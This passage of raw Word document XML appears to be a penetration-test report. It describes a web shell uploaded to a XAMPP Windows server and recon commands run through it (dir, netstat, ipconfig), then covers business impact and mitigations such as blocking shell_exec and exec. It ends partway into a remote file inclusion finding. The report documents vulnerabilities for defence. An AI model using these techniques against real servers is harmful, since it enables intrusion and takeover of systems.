    <w:p w14:paraId="71633220" w14:textId="77777777" w:rsidR="00924F2E" w:rsidRPr="00924F2E" w:rsidRDefault="00924F2E" w:rsidP="00924F2E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4869676D" w14:textId="3198FB59"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Let</w:t>
      </w:r>
      <w:r w:rsidR="0015790B" w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s take a look at Burp's message and it looks like the path with the file we planted </w:t>
      </w:r>
      <w:r w:rsidR="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>has actually passed</w:t>
      </w:r>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and received </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>successfully :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="18979858" w14:textId="77777777" w:rsidR="00CF2E0C" w:rsidRPr="00F94EEA" w:rsidRDefault="00CF2E0C" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06E23F15" wp14:editId="309AC2C6">
            <wp:extent cx="6416040" cy="1076325"/>
            <wp:effectExtent l="0" t="0" r="381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125" cy="1084727"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4B046C" w14:textId="77777777" w:rsidR="0061271A" w:rsidRPr="00F94EEA" w:rsidRDefault="0061271A" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E30401" w14:textId="77777777" w:rsidR="00924F2E" w:rsidRPr="00924F2E" w:rsidRDefault="0061271A" w:rsidP="00924F2E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll </w:t>
      </w:r>
      <w:r w:rsidR="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>forward</w:t>
      </w:r>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the message and it looks like we opened the Web Shell we planted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D9CF07" w14:textId="62C415C8" w:rsidR="00CF2E0C" w:rsidRPr="00924F2E" w:rsidRDefault="00924F2E" w:rsidP="00924F2E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17848DFC" wp14:editId="67616FFF">
            <wp:extent cx="5274310" cy="428625"/>
            <wp:effectExtent l="0" t="0" r="254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8625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="009E0F6C" w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D7A557" w14:textId="5DF7C11D"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We will run the Dir command (since this is Windows operating system) and we will notice that we are in the server's image folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE82E5C" w14:textId="77777777" w:rsidR="009E0F6C" w:rsidRPr="00F94EEA" w:rsidRDefault="009E0F6C" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FF0E22D" wp14:editId="77219DA7">
            <wp:extent cx="5274310" cy="314706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47060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D1B28C" w14:textId="115BD0EA"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 xml:space="preserve">We can examine these images and other files on the server. We can also test the server's network connections and network settings by using Netstat and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IPConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00924F2E">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF28627" w14:textId="77777777" w:rsidR="009E0F6C" w:rsidRPr="00F94EEA" w:rsidRDefault="009E0F6C" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5FAA108B" wp14:editId="1A498E86">
            <wp:extent cx="5274310" cy="5992495"/>
            <wp:effectExtent l="0" t="0" r="254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92495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="62114D0C" w14:textId="77777777" w:rsidR="009E0F6C" w:rsidRPr="00F94EEA" w:rsidRDefault="009E0F6C" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC5BF1E" w14:textId="77777777" w:rsidR="005A7281" w:rsidRPr="00F94EEA" w:rsidRDefault="00750463" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12ED5EFC" wp14:editId="376194C8">
            <wp:extent cx="5274310" cy="5993765"/>
            <wp:effectExtent l="0" t="0" r="254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93765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C52CC35" w14:textId="3F6876B3" w:rsidR="0061271A" w:rsidRDefault="003B1B63" w:rsidP="00924F2E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>By running commands like "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B1B63">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B1B63">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> c:\xampp\htdocs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>" we can examine other folders on the server without any problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259E88FF" w14:textId="47D0A9ED" w:rsidR="003B1B63" w:rsidRPr="003B1B63" w:rsidRDefault="003B1B63" w:rsidP="003B1B63">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B13CE8D" wp14:editId="7B64699F">
            <wp:extent cx="5274310" cy="3576320"/>
            <wp:effectExtent l="0" t="0" r="254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76320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73346E66" w14:textId="74C36C51" w:rsidR="003B1B63" w:rsidRPr="0022383C" w:rsidRDefault="003B1B63" w:rsidP="0022383C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David" w:cs="David"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>The command line we created gives us complete control over the victim server</w:t>
      </w:r>
      <w:r w:rsidR="0022383C">
        <w:rPr>
          <w:rFonts w:ascii="David" w:eastAsiaTheme="minorHAnsi" w:hAnsi="David" w:cs="David"/>
          <w:bCs w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC06857" w14:textId="10A6713C" w:rsidR="000E1DA8" w:rsidRPr="00787602" w:rsidRDefault="000E1DA8" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:szCs w:val="26"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Business impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43267415" w14:textId="5A2A323C" w:rsidR="0061271A" w:rsidRPr="00F94EEA" w:rsidRDefault="0061271A" w:rsidP="00F94EEA">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Using this attack, it is possible </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to  perform</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> almost any required malicious action on the server. This approach gives the attacker the ability to change settings; change user privileges (privileged escalation), steal, change and destroy system files, inspect the configuration settings of the server and change them at his will.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203F2F87" w14:textId="3546BE4E" w:rsidR="000E1DA8" w:rsidRPr="00787602" w:rsidRDefault="000E1DA8" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:szCs w:val="26"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00787602">
        <w:t>Mitigations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC49758" w14:textId="09459F53" w:rsidR="00E2361E" w:rsidRPr="007A0747" w:rsidRDefault="0061271A" w:rsidP="007A0747">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0747">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In order to minimize the chance of being hit by this attack, the following rules</w:t>
      </w:r>
      <w:r w:rsidR="007A0747">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A0747">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>must be followed</w:t>
      </w:r>
      <w:r w:rsidR="00E2361E" w:rsidRPr="007A0747">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C9B8AB" w14:textId="2297C270"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Avoid </w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>implementing</w:t>
      </w:r>
      <w:r w:rsidR="0061271A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the input received from the use</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">r in </w:t>
      </w:r>
      <w:r w:rsidR="0061271A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the site code</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE7A574" w14:textId="77777777" w:rsidR="00E2361E" w:rsidRPr="00F94EEA" w:rsidRDefault="00E2361E" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05BE7375" w14:textId="63D57D6E"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Perform appropriate validations on the user-received inputs. Non-specific files can be prevented (for example, in the case above, non-image files can be prevented), and it is important to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">prevent </w:t>
      </w:r>
      <w:r w:rsidR="0061271A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> uploading</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0061271A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP files or other code files in particular</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C766EC1" w14:textId="77777777" w:rsidR="00E2361E" w:rsidRPr="00F94EEA" w:rsidRDefault="00E2361E" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76600261" w14:textId="1D46D643" w:rsidR="0061271A" w:rsidRPr="00F94EEA" w:rsidRDefault="00E2361E" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0061271A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Absolute prevention of dangerous functions that could be used as a breach, such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0061271A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0061271A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (), exec (), system (), and preventing the user's input chain from within functions such as include (), require (), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0061271A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>include_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0061271A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>once</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FBC0D1" w14:textId="77777777" w:rsidR="00E2361E" w:rsidRPr="00F94EEA" w:rsidRDefault="00E2361E" w:rsidP="00F94EEA">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26891C5F" w14:textId="6CA49E99" w:rsidR="000E1DA8" w:rsidRPr="007A0747" w:rsidRDefault="00E2361E" w:rsidP="007A0747">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0061271A" w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Allowing characters registered in Whitelist is selected, which prevents the use of problematic characters that could be used as an outbreak</w:t>
      </w:r>
      <w:r w:rsidRPr="00F94EEA">
        <w:rPr>
          <w:rFonts w:ascii="David" w:hAnsi="David"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2865AAB1" w14:textId="14621A3A" w:rsidR="00827178" w:rsidRDefault="00827178" w:rsidP="00787602">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>RFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1294DCD8" w14:textId="72D4E980" w:rsidR="00827178" w:rsidRDefault="00827178" w:rsidP="00827178">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0EC0D1" w14:textId="1E3A74F2" w:rsidR="00827178" w:rsidRPr="00827178" w:rsidRDefault="00827178" w:rsidP="00827178">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Out team found </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> RFI vulnerability in the website. By using a vulnerability in the private profile page, a malicious user could exploit a vulnerable parameter and connect to an external server, using it in to create a command prompt on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A11D1FC" w14:textId="28502F35" w:rsidR="00827178" w:rsidRDefault="00827178" w:rsidP="00827178">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Proof of concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272FC19F" w14:textId="3474F447" w:rsidR="00827178" w:rsidRDefault="00827178" w:rsidP="00827178">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>The malicious user enters his profile page. The page contains an option to change to background. We'll notice that the parameter shows in the URL, meaning it's working with</w:t>
      </w:r>
      <w:r w:rsidR="00F33835">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> GET method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69984C60" w14:textId="678CF41D" w:rsidR="00827178" w:rsidRDefault="009F5065" w:rsidP="00827178">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="257DF28D" wp14:editId="737486BB">
            <wp:extent cx="5814268" cy="1971923"/>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834" cy="1978559"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C26E2BE" w14:textId="22D65E32" w:rsidR="00827178" w:rsidRDefault="009F5065" w:rsidP="009F5065">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>We'll notice that the parameter actually uses an address- "brownback.html", meaning that there is probably an implementation of a function like "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>include(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)" that is using our input.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0F1282" w14:textId="5DFE100E" w:rsidR="007D45E2" w:rsidRDefault="007D45E2" w:rsidP="007D45E2">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
